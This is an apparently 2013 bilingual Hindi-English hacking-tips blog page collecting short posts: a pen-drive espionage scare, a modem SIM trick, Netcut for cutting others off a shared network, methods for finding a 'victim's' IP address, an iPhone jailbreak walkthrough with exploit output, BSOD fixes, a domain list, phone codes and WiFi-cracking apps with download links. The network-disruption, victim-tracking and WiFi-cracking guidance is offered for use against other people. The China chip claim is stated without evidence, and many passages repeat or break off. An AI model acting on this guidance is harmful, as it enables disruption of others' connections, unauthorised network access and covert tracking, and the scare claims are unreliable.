मित्रो ये हमारे लिए बड़े शर्म की बात है कि हम एक छोटी सी पेन ड्राइव भी
दूसरे देश से मंगनी पड़ती है और इसी चीज़ का फायदा चीन ने उठाया है जिससे हमारे देश की सुरक्षा तक खतरे में पड़ गयी है आपको यकीं नहीं होगा अगर इस समय युद्ध हो गया तो चीन हमे कुछ दिन में ही पंगु कर देगा..क्योंकि जो भी हम रणनीति बनायेगे वो तुरन्त ही चीन में पहुँच जाएगी.. इसका कारण है ये छोटी सी पेन ड्राइव..पेन ड्राइव एक ऐसा छोटा सा उपकरण है जिसमें कोई भी जानकारी रख सकते है तथा
इसे किसी भी समय कहीं पर भी लाया ले जाया जा सकता है। प्रतिबंध के बावजूद
सुरक्षा बलों में पेन ड्राइव एक प्रमुख खतरे के रूप में सामने आए हैं,
क्योंकि तीनों सैन्य सेवाओं में हुई सुरक्षा चूकों के 70 प्रतिशत मामलों
में यही उपकरण जिम्मेदार है।
आज कल चीन जो पेन ड्राइव भारत में
भेज रहा है उसमे एक चीप लगी आ रही है जो नेट कांनेट/कनेक्ट कंप्यूटर में
लगते ही कंप्यूटर का सारा डाटा भेजने लगती है हमारे सैन्य अधिकारियो के
कंप्यूटर में उपस्तिथ देश की सुरक्षा का पूरा डाटा एक बार कनेक्ट होते ही
ये पेन ड्राइव सारा का सारा डाटा दुश्मन के हाथ में भेज सकती है..
सेना के एक अधिकारी ने बताया कि हाल के दिनों में पेन ड्राइव का इस्तेमाल
बढ़ गया है, क्योंकि यह सूचना भंडारण और उन्हें आसानी से कहीं भी ले जाने
वाला उपकरण है। आंतरिक रपटों में इस बात की पुष्टि हुई है कि सशस्त्र
सेनाओं में 70 प्रतिशत साइबर सुरक्षा चूकें इसके अनधिकृत उपयोग के कारण
हुईं। उन्होंने कहा कि पेन ड्राइव, जिनमें से अधिकतर चीन में बनी होती है,
अगर सरकार ने जल्द ही इस दिशा में कोई कदम नहीं उठाया तो देश राम भरोसे
है...
This Blog is Specially for All Types of Computer User. Purpose of this blog is to Share Knowledge and FREE Help to Every Computer and Internet User.(WARNING NOTE:- THIS BLOG IS ONLY FOR EDUCATIONAL PURPOSE, BECAUSE IT CONTAIN SOME ILLEGAL INFORMATION ALSO ABOUT COMPUTER HACKING, SO THE DAMAGE OCCURRED BY THIS POST,I WILL NOT RESPONSIBLE FOR YOUR DAMAGE OR LOSS)
Wednesday, February 27, 2013
Tuesday, February 26, 2013
Monday, February 25, 2013
Use Any SIM In Any Modem Without Unlocking It
Every One its not possible to use any SIM in a modem without unlocking.
For that you have to Pay.
But don't worry with the following trick you can do it for free :-)
Step by step instruction:
1. Insert SIM in Modem
2. Modem show invalid SIM, just ignore it and close modem software.
3. Start NOKIA PC suite.
4. Go to Nokia pc suite connect to internet option.
5. Go to Configure. Select your data card modem,and make all operator apn setting as like when we use Nokia mobile connection.
Eg:- Apn for Airtel – airtelgprs.com
6. Finish set up.
7. Now connect to internet through PC suite.
8. Wow your net is connected without unlocking the modem.
For that you have to Pay.
But don't worry with the following trick you can do it for free :-)
Step by step instruction:
1. Insert SIM in Modem
2. Modem show invalid SIM, just ignore it and close modem software.
3. Start NOKIA PC suite.
4. Go to Nokia pc suite connect to internet option.
5. Go to Configure. Select your data card modem,and make all operator apn setting as like when we use Nokia mobile connection.
Eg:- Apn for Airtel – airtelgprs.com
6. Finish set up.
7. Now connect to internet through PC suite.
8. Wow your net is connected without unlocking the modem.
Friday, February 22, 2013
Bandwidth Stealer For Fast Browsing
If you are in your school's computer lab or in home , this software will always help you in your work . It is common thing to have many computer's connected with one device for internet and it causes your bandwidth to fall down . Here I am introducing a software called netcut which cuts the one's connection in such a crucial condition as I stated, I am stating it as crucial as really it’s a headache causing problem for me I hate slow surfing.When it cuts the one's connection , it automatically increases bandwidth of your connection which will let you work more easily and fastly.
Download Netcut here for Free (Last Updated 21/12/2011):-
---------------------------------------------------------------
You can download this bandwidth stealing software named as Netcut from below:-
http://www.ziddu.com/download/17895351/netcut.rar.html
http://www.mediafire.com/?vw0y869rh8pymz8
Using Netcut :-
-----------------
1: Download net cut.
2: Extract the software and install it.
3: Now open netcut software and a window will pop-out showing you connected routers.
4: Just toggle to the computer which you want to cut off like this photo: Netcut Use
5: And that's it.Now you are free to eat up every last bit of bandwidth. Enjoy
Download Netcut here for Free (Last Updated 21/12/2011):-
---------------------------------------------------------------
You can download this bandwidth stealing software named as Netcut from below:-
http://www.ziddu.com/download/17895351/netcut.rar.html
http://www.mediafire.com/?vw0y869rh8pymz8
Using Netcut :-
-----------------
1: Download net cut.
2: Extract the software and install it.
3: Now open netcut software and a window will pop-out showing you connected routers.
4: Just toggle to the computer which you want to cut off like this photo: Netcut Use
5: And that's it.Now you are free to eat up every last bit of bandwidth. Enjoy
Thursday, February 21, 2013
इंटरनेट पर बचाव के पांच नुस्खे!
1- ईमेल
ईमेल दुनियाभर से संपर्क स्थापित करने का एक बेहतरीन ज़रिया है लेकिन आपका क्लिक करें ईमेल एकाउंट कई तरह से घातक भी साबित हो सकता है. ईमेल के ज़रिए आपके कंप्यूटर और निजी तौर पर आपको कई तरह के नुकसान पहुंचाए जा सकते हैं.- इंटरनेट पर अपने ईमेल को सुरक्षित बनाने के लिए अज्ञात स्रोत से आए ‘स्पैम’ यानी गैर ज़रूरी ईमेल को न खोलें.
- जिन ईमेल पतों पर अंग्रेज़ी के गलत या बहुभाषी अक्षर लिखें हों, जिनके विषय भी ऐसे हों उन्हें बिना पहचाने क्लिक करना भी खतरनाक हो सकता है.
- इस तरह के ईमेल से आए डॉक्यूमेंट पढ़ने की कोशिश न करें.
- गैर ज़रूरी ईमेल के भीतर ‘रिमूव’ का विकल्प दिखने पर भी उसके ज़रिए ईमेल को नष्ट न करें.
2- पासवर्ड
- इंटरनेट पर हर व्यक्ति की पहचान उसके पासवर्ड के ज़रिए होती है. इसके लीक होते ही आपकी निजी जानकारियां सार्वजनिक हो सकती हैं. पासवर्ड के ज़रिए अपराधी इन जानकारियों का गलत इस्तेमाल भी कर सकते हैं.
- जहां तक संभव हो इंटरनेट पर अपनी हर जानकारी को पासवर्ड से सुरक्षित करें.
- पासवर्ड बड़े और छोड़े अक्षरों सहित अंकों का मिलाजुला रुप होना चाहिए. पासवर्ड जितना कठिन होगा उसे भेदना उतना ही मुश्किल.
- अपने पासवर्ड को इंटरनेट पर सोच समझकर ज़ाहिर करें. अनजान वेबसाइट पर पासवर्ड लिखना खतरनाक हो सकता है.
- समय–समय पर अपने पासवर्ड बदलते रहें. एक ही पासवर्ड कई जगह इस्तेमाल न करें
3- इंटरनेट पर जालसाज़ी
साइबर अपराधी इंटरनेट पर लोगों को अपना शिकार बनाने की फ़िराक में रहते हैं. उनसे बचने के लिए कई तरह के क़दम उठाने ज़रूरी हैं.- पैसों से लेन-देन से जुड़े कई तरह के ईमेल आमतौर पर अकाउंट में आते हैं. विदेशियों का ज़िक्र लिए इन ईमेल के जवाब में कोई जानकारी न भेजें.
- लोन देने, चैरिटी के लिए पैसा मांगने, बकाया पैसा लौटाने और लॉटरी से जुड़े ईमेल आमतौर पर लोगों को फंसाने का ज़रिया होती हैं. इनका जवाब भेजने और जानकारियां मांगने के बजाय इनके बारे में साइबर अपराध शाखा को सूचित करें.
4- वायरस से बचाव
वायरस तकनीकी भाषा में लिखा गया वो प्रोग्राम है जो व्यापक स्तर पर कंप्यूटर को नुकसान पहुंचाने की दृष्टि से बनाया जाता है. इसके ज़रिए कोई इंटरनेट पर आपकी पहचान चुरा सकता है.- वायरस से बचने के लिए अनजान स्रोत से आई जानकारियों को क्लिक न करें.
- अपने कंप्यूटर पर वायरस से बचाव करने वाले सॉफ्टवेयर यानी एंटीवायरस डाउनलोड कर रखें.
- कंप्यूटर से जुड़े किसी भी बाहरी उपकरण को इस्तेमाल से पहले वायरस के लिए जांच लें. हर कंप्यूटर में ये सुविधा उपलब्ध होती है.
- इंटरनेट पर मौजूद मुफ्त फिल्में, गाने और सॉफ्टवेयर आमतौर पर वायरस से संक्रमित होते हैं. ऐसा करते समय विशेष रुप से ध्यान रखें.
5- सार्वजनिक जगहों पर कंप्यूटर का इस्तेमाल
सार्वजनिक रुप से उपलब्ध इंटरनेट यानी वाई-फाई
वायरस जैसे खतरों का सबसे बड़ा स्रोत हो सकता है. इसके ज़रिए कोई आपकी निजी
जानकारियां पढ़ सकता है.- सार्वजनिक जगहों पर कंप्यूटर का इस्तेमाल करते हुए किसी भी तरह के अनजान संदेश को स्वीकार न करें.
- अनजान, अजीबोगरीब लिंक पर क्लिक करने से बिना आपकी इजाज़त भी कंप्यूटर की जानकारियां स्रोत तक पहुंच सकती हैं.
- जहां तक संभव हो अपने बैंक खातों से जुड़ी जानकारियां अनजान वेबसाइट पर न डालें.
Tuesday, February 19, 2013
Using Read Notify service
This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated.
Do the following steps use this service:
Compose your email just like you usually would in your own email or web email program
Type: readnotify.com on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: shiviskingg@gmail.com.read notify.com
Send your email
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated.
Do the following steps use this service:
Compose your email just like you usually would in your own email or web email program
Type: readnotify.com on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: shiviskingg@gmail.com.read
Send your email
What is an IP address?
Basically
IP address (Internet Protocol address) is a unique numerical value that
is assigned to any computer or printer on a computer network that uses
an internet protocol for communication purpose. Protocol is basically
rules (for Network its rules for communication).
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing
For exploring more about IP addressing read on wikipedia.
http://en.wikipedia.org/ wiki/IP_address
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing
For exploring more about IP addressing read on wikipedia.
http://en.wikipedia.org/
4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and Yahoo chat sessions
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and Yahoo chat sessions
How to Jailbreak A5 iDevices using Command line in Windows
A5
jailbreak Absinthe now officially released for windows but still some
geek users likes to Jailbreak their devices using Command Line Interface
(CLI) method.
Step 1:
---------
Make sure your iDevice is backed up using iTunes & Passcode is deactivated
Step 2:
---------
Download Absinthe CLI files (Cinject) from here
http://www.mediafire.com/?5mywppfndm5dpja
Step 3:
---------
Connect your iDevice to your PC
Step 4:
---------
Extract the downloaded zip file to any folder.
(I extracted it to my user folder C:\users\yourusername & renamed that folder to cinject for easy typing)
Step 5:
---------
Launch Command line (CMD) on your windows machine.
Press Win key + R & type “CMD” & press enter
Step 6:
---------
Now CD Command line to “cinject” folder
Type
CD C:\users\yourusername\cinject
And press enter
Step 7:
---------
Now type cinject & press enter to make sure that “cinject” is in the selected folder and working
Step 8:
---------
Your command line will look like this
C:\Users\Amish-PC\cinject>cinject
Usage: cinject [ options ]
Corona injector CLI v0.4.3
Copyright (C) 2011-2012 by iPhone Dev. Team
With exploit work by: @pod2g, @planetbeing, @saurik, @pimskeks, @p0sixninja, @Mu
scleNerd, and @xvolks
Options:
Configuration profiles:
-l List current profiles
-i Install profile
-r [] Remove all profiles, or profiles matching pattern
AFC transfers:
-a Alternative afc service to use (2 is available after jailbreak)
-u … Upload file(s) via afc (add final “dir=dirname” to specify which afc directory)
-d [] Show list of files in afc directory
-X Delete afc directory or file
ROP assistance:
-s Compute slide
-e Erase existing crash logs
-g Get diagnostics
Backups and restores:
-B Create backup
-R Restore from backup
-L List contents of an MBDB file
-M Modify the ipsec.plist on device
-p Modify the preferences.plist (requires -f too)
-f File to use with -p
-H Hide media files
-U Unhide media files
Chained operations:
-j Jailbreak device using given payloads directory (ADVANCED use only!)
Other:
-w Watch syslog
-v Debug verbosity level
-h This help message
C:\Users\Shyam\cinject>
Step 9:
---------
Now type the following command without quotes & press enter
“cinject -i payloads/jailbreak.mobileconfig”
This will install an profile in your iDevice.
Step 10:
----------
Now you will see dialog like this in your iDevice.
Now select “Install”
Now select “Install Now” and Install the Profile.
Step 11:
-----------
Now select next without entering any password.
now VPN profile for jailbreak will be installed & you can close settings & return to command line
Step 12:
----------
Now enter the following command without quotes in CMD
“cinject -j payloads”
Your CMD will look like this
C:\Users\Shyam\cinject>cinject -j payloads
Finding slide…
Generating ROP…
ROP was generated
Uploaded corona/payload
Uploaded corona/payload-vars
Uploaded corona/racoon-exploit.conf
Uploaded corona/vnimage.clean
Uploaded corona/vnimage.overflow
Uploaded corona/vnimage.payload
Uploaded corona/corona.tgz
Uploaded corona/cleanup
Uploaded corona/com.apple.ipsec.plist
Uploaded corona/Cydia.tgz
Uploaded corona/filemover
Uploaded corona/filemover.plist
Uploaded corona/gzip
Uploaded corona/jailbreak
Uploaded corona/jailbreak.mobileconfig
Uploaded corona/jb.plist
Uploaded corona/racoon-exploit-bootstrap.conf
Uploaded corona/tar
Creating backup…
72 files backed up
Adding custom com.apple.ipsec.plist to backup
Restoring…
1 files restored
Now use “cinject -w” to start watching the syslog.
Then toggle VPN on and look for the “pod2g is in da house!” syslog message.
This actually takes an backup of your .plist files and modify some values and restore it plus inject some files for jailbreak.
Some users will stuck in backup those users “Erase All Content and Settings” setup like new iPad & after jailbreak restore backup with iTunes
Step 13:
-----------
Now enter following code in command line without quotes
“cinject -w”
Now your command line will look like matrix wallpaper, ignore everything.
Step 14:
----------
At the end when it stops, Go to VPN Settings in your iDevice and toggle VPN ON and look for syslog message “pod2g is in da house!“. After that your iDevice will restart and you will see cydia on screen. Launch Cydia and enjoy your Jailbroken iPhone 4S &and iPad 2.
For Advanced Users:
-------------------------
cinject -i payloads/jailbreak.mobileconfig
cinject -j payloads
cinject -w
toggle VPN on
Step 1:
---------
Make sure your iDevice is backed up using iTunes & Passcode is deactivated
Step 2:
---------
Download Absinthe CLI files (Cinject) from here
http://www.mediafire.com/?5mywppfndm5dpja
Step 3:
---------
Connect your iDevice to your PC
Step 4:
---------
Extract the downloaded zip file to any folder.
(I extracted it to my user folder C:\users\yourusername & renamed that folder to cinject for easy typing)
Step 5:
---------
Launch Command line (CMD) on your windows machine.
Press Win key + R & type “CMD” & press enter
Step 6:
---------
Now CD Command line to “cinject” folder
Type
CD C:\users\yourusername\cinject
And press enter
Step 7:
---------
Now type cinject & press enter to make sure that “cinject” is in the selected folder and working
Step 8:
---------
Your command line will look like this
C:\Users\Amish-PC\cinject>cinject
Usage: cinject [ options ]
Corona injector CLI v0.4.3
Copyright (C) 2011-2012 by iPhone Dev. Team
With exploit work by: @pod2g, @planetbeing, @saurik, @pimskeks, @p0sixninja, @Mu
scleNerd, and @xvolks
Options:
Configuration profiles:
-l List current profiles
-i Install profile
-r [] Remove all profiles, or profiles matching pattern
AFC transfers:
-a Alternative afc service to use (2 is available after jailbreak)
-u … Upload file(s) via afc (add final “dir=dirname” to specify which afc directory)
-d [] Show list of files in afc directory
-X Delete afc directory or file
ROP assistance:
-s Compute slide
-e Erase existing crash logs
-g Get diagnostics
Backups and restores:
-B Create backup
-R Restore from backup
-L List contents of an MBDB file
-M Modify the ipsec.plist on device
-p Modify the preferences.plist (requires -f too)
-f File to use with -p
-H Hide media files
-U Unhide media files
Chained operations:
-j Jailbreak device using given payloads directory (ADVANCED use only!)
Other:
-w Watch syslog
-v Debug verbosity level
-h This help message
C:\Users\Shyam\cinject>
Step 9:
---------
Now type the following command without quotes & press enter
“cinject -i payloads/jailbreak.mobileconfig”
This will install an profile in your iDevice.
Step 10:
----------
Now you will see dialog like this in your iDevice.
Now select “Install”
Now select “Install Now” and Install the Profile.
Step 11:
-----------
Now select next without entering any password.
now VPN profile for jailbreak will be installed & you can close settings & return to command line
Step 12:
----------
Now enter the following command without quotes in CMD
“cinject -j payloads”
Your CMD will look like this
C:\Users\Shyam\cinject>cinject -j payloads
Finding slide…
Generating ROP…
ROP was generated
Uploaded corona/payload
Uploaded corona/payload-vars
Uploaded corona/racoon-exploit.conf
Uploaded corona/vnimage.clean
Uploaded corona/vnimage.overflow
Uploaded corona/vnimage.payload
Uploaded corona/corona.tgz
Uploaded corona/cleanup
Uploaded corona/com.apple.ipsec.plist
Uploaded corona/Cydia.tgz
Uploaded corona/filemover
Uploaded corona/filemover.plist
Uploaded corona/gzip
Uploaded corona/jailbreak
Uploaded corona/jailbreak.mobileconfig
Uploaded corona/jb.plist
Uploaded corona/racoon-exploit-bootstrap.conf
Uploaded corona/tar
Creating backup…
72 files backed up
Adding custom com.apple.ipsec.plist to backup
Restoring…
1 files restored
Now use “cinject -w” to start watching the syslog.
Then toggle VPN on and look for the “pod2g is in da house!” syslog message.
This actually takes an backup of your .plist files and modify some values and restore it plus inject some files for jailbreak.
Some users will stuck in backup those users “Erase All Content and Settings” setup like new iPad & after jailbreak restore backup with iTunes
Step 13:
-----------
Now enter following code in command line without quotes
“cinject -w”
Now your command line will look like matrix wallpaper, ignore everything.
Step 14:
----------
At the end when it stops, Go to VPN Settings in your iDevice and toggle VPN ON and look for syslog message “pod2g is in da house!“. After that your iDevice will restart and you will see cydia on screen. Launch Cydia and enjoy your Jailbroken iPhone 4S &and iPad 2.
For Advanced Users:
-------------------------
cinject -i payloads/jailbreak.mobileconfig
cinject -j payloads
cinject -w
toggle VPN on
How To Fix BSOD Error Codes
A
Blue screen of Death (BSOD) is known as the STOP error. When Windows
suffers from a serious error of non-recoverable nature, it stops
immediately so as to prevent damage to the data or hardware. STOP error
includes a STOP code which can be used to diagnose and possibly fix the
problem.
List of few BSOD errors are given below
~~~~~~~~~~~~~~~~~~~~~~~~~~
Stop 0x000000CE or DRIVER_UNLOADED_WITHOUT_CANCELLING_PENDING_OPERATIONS
It indicates that before exiting, a driver failed to cancel pending operations.
Fix
----
It might occur because of installing a faulty device driver/system
device. Disabling or removing drivers (name is mentioned in the STOP
message) resolves the issue. Using updated software also resolves the
issue.
Stop 0×00000050 or PAGE_FAULT_IN_NONPAGED_AREA
------------------------------------------------------------------
This indicates that requested data was not in the memory. It happens when a reference to an invalid system memory address is done. Defective memory or incompatible software might cause this error.
Fix
-----
If hardware is added recently, remove and replace it to determine if it was contributing to the problem or not.
If a faulty driver/system service is installed. Always use updated drivers and software to avoid this error.
Stop 0x0000009F or DRIVER_POWER_STATE_FAILURE
---------------------------------------------------------------
This indicates that a driver is in an inconsistent power state.
Fix
-----
It can occur after installing faulty applications/drivers/system services. We need to uninstall the particular application (name is mentioned in the STOP message)/ roll back the particular driver/ use updated version of the software.
Stop 0xBE or ATTEMPTED_WRITE_TO_READONLY_MEMORY
-----------------------------------------------------------------------
It indicates that a driver has attempted to write to read-only memory
Fix
----
It occurs because of installation of a faulty device driver/system services/firmware. Try to use updated version of software to resolve this problem. If the driver name is mentioned in the STOP message, we have to remove the driver or have to use a possible update of it.
Stop 0X0000002E or DATA_BUS_ERROR
-----------------------------------------------
It indicates a system memory parity error. It is caused due to defective or failed RAM/incompatibility of memory hardware. Also when a device driver attempts to access an address in the range of 0x8xxxxxxx that does not exist, this error occurs. It can also indicate that virus or some other problem caused hard disk damage.
Fix
----
This error is mainly due to defective/malfunctioning memory hardware like memory modules, video adapter RAM. Remove and replace the hardware to find out its contribution to the error.
Hard Disk corruption is also a cause of this problem
Cracks, scratches or defective component on the motherboard can also cause this problem. Repair the motherboard.
It can also happen due to installation of faulty drivers or system services. If file name is provided in the error code, remove that driver. Also use updated version of software’s.
Stop 0x000000D1 or Driver_IQRL_NOT_LESS_OR_EQUAL
------------------------------------------------------------------
It indicates that the system has attempted for an access to a page able memory by using a kernel process IQRL that was too high. Improper addresses used by driver’s causes this error.
Fix
-----
It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.
Stop 0x000000EA or THREAD_STUCK_IN_DEVICE_DRIVER
-------------------------------------------------------------------
It is caused by a display driver making the system to pause indefinitely. Over here the display driver waits for the video hardware to enter an idle state. All this indicate a hardware problem with the video driver.
Fix
-----
It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.
I hope this post has helped you in understanding all about different types of BSOD errors and its’ fixes. So please give your suggestions and comments so that it can be improved more.
Monday, February 11, 2013
Customize your Browser Home Page to Look like Windows 8
Bored
looking at the same default home page whenever your browser starts?
Then try "EIGHT", a browser start screen inspired from Windows 8's tiled
interface. It is basically a web page created using HTML, CSS and
jQuery. It shows website shortcuts as tiles which when clicked open the
associated URLs. It's also got a search bar right in the page itself.
Not only EIGHT looks awesome,
it is customizable too. You can replace the shortcuts with your own
favorite sites, you can change the default search engine, you can
customize the background color and you can even use a wallpaper as
background. EIGHT is compatible with all the major browsers (Firefox,
Chrome, Opera, Internet Explorer).
To use it, first download the ZIP file from here "www.deviantart.com/download/212847573/eight___start_page___update_by_flatmo1-d3iq28l.zip"
and extract the folder contained in it somewhere on your hard drive.
Navigate to the folder (usually named "EIGHT-firefox start page+config")
and open the “index.htm” with your preferred web browser. Close all
other opened tabs before you continue.
Mozilla Firefox Users :
--------------------------
Click on the orange Firefox button and choose "Options". Under the
"General" tab select “Show my home page” from “When Firefox starts“ and
click the "Use Current Pages" button. Press [enter].
Google Chrome Users :
----------------------------
Copy the URL from the address bar. Click on the "wrench" button and
select "Options". Choose "Open the following pages:" under "On startup"
and in the "New tab" field paste the URL you copied earlier. Also,
select "Open this page" from "Home page" and paste the same URL in its
field. Close the tab and reload.
Other Browser Users : Follow similar steps as mentioned above.
Customizing EIGHT :
-------------------------
To customize EIGHT, again navigate to "EIGHT-firefox start page+config"
and run "config.htm". Modify the shortcuts and texts as per your
preference and click "Generate settings file". Copy the entire code. Now
open "source.js" (also present in "EIGHT-firefox start page+config"
folder) with notepad, replace the original texts with the copied text.
Save the file.
Note : If you wish to change any pre-defined website shortcut with a new one, first paste the website logo in the "thumbs" folder. Now run "config.htm", click on the shortcut tile you wish to replace and provide title and URL of the website along with the name of the website logo.
You can find thumbnails icons here : Thumbnails for "EIGHT" by ~jeppethe
http://jeppethe.deviantart.com/art/Thumbnails-for-quot-EIGHT-quot-213277665
Check this link if you want to change the background color or want to use your own wallpaper as background.
http://eight.kx.cz/faq.htm
How to Gmail in a Pen Drive (Mail Stores)
You
can backup your All E-mail in to your PC or Pen drive by using
Microsoft Outlook express. You can also use software that is MailStore,
It is the best software for Email archiving and backup software .You can
download Mailstore software from the official website of Mailstore.
First Download Mail Store
http://www.mailstore.com/en/mailstore-home.aspx
First Download Mail Store
http://www.mailstore.com/en/mailstore-home.aspx
List of Top Level Domain (TLD)
Name : xxxxxx
Entity : xxxxxxxx
Notes : xxxxxxxxx
.aero
air-transport industry
Must verify eligibility for registration; only those in various categories of air-travel-related entities may register.
.asia
Asia-Pacific region
This is a TLD for companies, organizations, and individuals based in the region of Asia, Australia, and the Pacific.
.biz
business
This is an open TLD; any person or entity is permitted to register; however, registrations may be challenged later if they are not held by commercial entities in accordance with the domain’s charter. This TLD was created to provide relief for the wildly-popular .com TLD.
.cat
Catalan
This is a TLD for Web sites in the Catalan language or related to Catalan culture.
.com
commercial
This is an open TLD; any person or entity is permitted to register. Though originally intended for for-profit business entities, for a number of reasons it became the “main” TLD for domain names and is currently used by all types of entities including nonprofits, schools and private individuals. Domain name registrations may be challenged if the holder cannot prove an outside relation justifying reservation of the name, to prevent “squatting”.
.coop
cooperatives
The .coop TLD is limited to cooperatives as defined by the Rochdale Principles.
.edu
educational
.gov
governmental
The .gov TLD is limited to U.S. governmental entities and agencies.
.info
information
This is an open TLD; any person or entity is permitted to register.
.int
international organizations
The .int TLD is strictly limited to organizations, offices, and programs which are endorsed by a treaty between two or more nations.
.jobs
companies
.mil
U.S. military
The .mil TLD is limited to use by the U.S. military.
.mobi
mobile devices
Must be used for mobile-compatible sites in accordance with standards.
.museum
museums
Must be verified as a legitimate museum.
.name
individuals, by name
.net
network
This is an open TLD; any person or entity is permitted to register. Originally intended for use by domains pointing to a distributed network of computers, or “umbrella” sites that act as the portal to a set of smaller websites.
.org
organization
This is an open TLD; any person or entity is permitted to register. Originally intended for use by non-profit organizations, and still primarily used by same.
.pro
professions
.tel
Internet communication services
A contact directory housing all types of contact information directly in the Domain Name System.
.travel
travel and tourism industry related sites
Must be verified as a legitimate travel-related entity.
.xxx adult entertainment
For sites providing sexually-explicit content.
Entity : xxxxxxxx
Notes : xxxxxxxxx
.aero
air-transport industry
Must verify eligibility for registration; only those in various categories of air-travel-related entities may register.
.asia
Asia-Pacific region
This is a TLD for companies, organizations, and individuals based in the region of Asia, Australia, and the Pacific.
.biz
business
This is an open TLD; any person or entity is permitted to register; however, registrations may be challenged later if they are not held by commercial entities in accordance with the domain’s charter. This TLD was created to provide relief for the wildly-popular .com TLD.
.cat
Catalan
This is a TLD for Web sites in the Catalan language or related to Catalan culture.
.com
commercial
This is an open TLD; any person or entity is permitted to register. Though originally intended for for-profit business entities, for a number of reasons it became the “main” TLD for domain names and is currently used by all types of entities including nonprofits, schools and private individuals. Domain name registrations may be challenged if the holder cannot prove an outside relation justifying reservation of the name, to prevent “squatting”.
.coop
cooperatives
The .coop TLD is limited to cooperatives as defined by the Rochdale Principles.
.edu
educational
The .edu TLD is limited to specific educational institutions such as,
but not limited to, primary schools, middle schools, secondary schools,
colleges, and universities. In the US, its usability was limited in 2001
to post-secondary institutions accredited by an agency on the list of
nationally recognized accrediting agencies maintained by the United
States Department of Education. This domain is therefore almost
exclusively used by U.S. colleges and universities. Some institutions
that do not meet the current registration criteria havegrandfathered
domain names.
.gov
governmental
The .gov TLD is limited to U.S. governmental entities and agencies.
.info
information
This is an open TLD; any person or entity is permitted to register.
.int
international organizations
The .int TLD is strictly limited to organizations, offices, and programs which are endorsed by a treaty between two or more nations.
.jobs
companies
The .jobs TLD is designed to be added after the names of established
companies with jobs to advertise. At this time, owners of a
“company.jobs” domain are not permitted to post jobs of third party
employers.
.mil
U.S. military
The .mil TLD is limited to use by the U.S. military.
.mobi
mobile devices
Must be used for mobile-compatible sites in accordance with standards.
.museum
museums
Must be verified as a legitimate museum.
.name
individuals, by name
This is an open TLD; any person or entity is permitted to register;
however, registrations may be challenged later if they are not by
individuals (or the owners of fictional characters) in accordance with
the domain’s charter.
.net
network
This is an open TLD; any person or entity is permitted to register. Originally intended for use by domains pointing to a distributed network of computers, or “umbrella” sites that act as the portal to a set of smaller websites.
.org
organization
This is an open TLD; any person or entity is permitted to register. Originally intended for use by non-profit organizations, and still primarily used by same.
.pro
professions
Currently,
.pro is reserved for licensed or certified lawyers, accountants,
physicians and engineers in France, Canada, NL, UK and the U.S. A
professional seeking to register a .pro domain must provide their
registrar with the appropriate credentials.
.tel
Internet communication services
A contact directory housing all types of contact information directly in the Domain Name System.
.travel
travel and tourism industry related sites
Must be verified as a legitimate travel-related entity.
.xxx adult entertainment
For sites providing sexually-explicit content.
Secret hack codes for iPhone 4 or 4S
Hello
friends, today i am going to share all the available secret hack codes
for iPhone 4 or iPhone 4S. These secret hack codes will help you to hack
the iPhone and helps you to explore the internal settings of your iPhone.
Secret codes are actually those codes which are not known(hidden) to
general users, usually Geeks use these codes as their shortcuts to
browse the internal settings and perform their exploits. As we all know
iPhone is quite secured and there are very less hack codes available for
the same but don't worry Guys i come up with all the available hacking
codes that works on iPhone 4 or 4S. You can also try these hack codes
on previous models as i have tested them only of iPhone 4 and iPhone 4S.
Some of them works on iPhone 4 and some on iPhone 4S and some are
specific to operator. So please don't complain if any of them didn't
work for you.. All codes are tested personally and are 100% working..
Secret hack codes for iPhone 4 or 4S
--------------------------------------------
Note: Some of codes will require tapping of call key on your iPhone,
actually most of them require call button + tap(means slide it). So if
any code doesn't work just by dialing, you just need to tap the call key
and it will work. Infact except the IMEI number one hack code all
require call + tap.
*#43#
Use to verify if call waiting is enabled
*#61#
Verify the number for unanswered calls
*#62#
Verify the number for call forwarding if no service is available.
*#67#
Verify the number for call forwarding if phone is busy
*#33#
To verify whether barring is enabled or disabled for outgoing
*#21#
To display the settings for your call forwarding
*3001#12345#*
Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone.
*#06#
Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.
*225#
Displays the account balance for postpaid contracts.
*777#
Displays the account balance for prepaid accounts.
*646#
Displays the remaining minutes available.
*3282#
Get your data usage information.
*729
Options to make payments. Its operator specific.
611
Dials customer service, (114 in RSA for Vodacom). Its operator specific.
*#30#
This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.
*#76#
State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.
Note: This is the list of all iPhone codes available till now in
market. If hope i haven't even missed the one. If still you are able to
find any extra hack code for iPhone 4 or iPhone 4S then don't hesitate
in sharing, as Sharing is Caring.
Four Best WiFi Cracking Applications For your Iphone
1. Aircrack-ng for IPhone:
--------------------------------
It is the simple command line with graphical interface software which is used to crack wifi networks . It sends packets to the wifi network and then cracks the password file of the network .It is used widely and can be downloaded from here.
http://www.filecrop.com/Aircrack-ng-for-iPhone.html
2. IWep Lite:
-----------------
It is an Iphone applications which let you crack wifi network in less than 30 minutes . It is easy in use and can be understood easily rather than Aircrack-ng . It is Graphical interface with best utility and dictionary . Apart from Aircrac-ng it uses dictionary and so it is less trustworthy than Aircrack and can not crack every key. It is used more widely than Aircrack but it uses dictionary that's why it is on 2nd number. It can be downloaded from here .
http://www.filecrop.com/iWep-Lite.ipa.html
3. WepGen:
---------------
WepGen is just another application which cracks the Wifi network by sending packets and it is rather easy in use than Aircrack but though it is on 3rd number due to it's popularity. It can be downloaded from here.
http://www.filecrop.com/wep-gen.ipa.html
4. IWifi Hack:
------------------
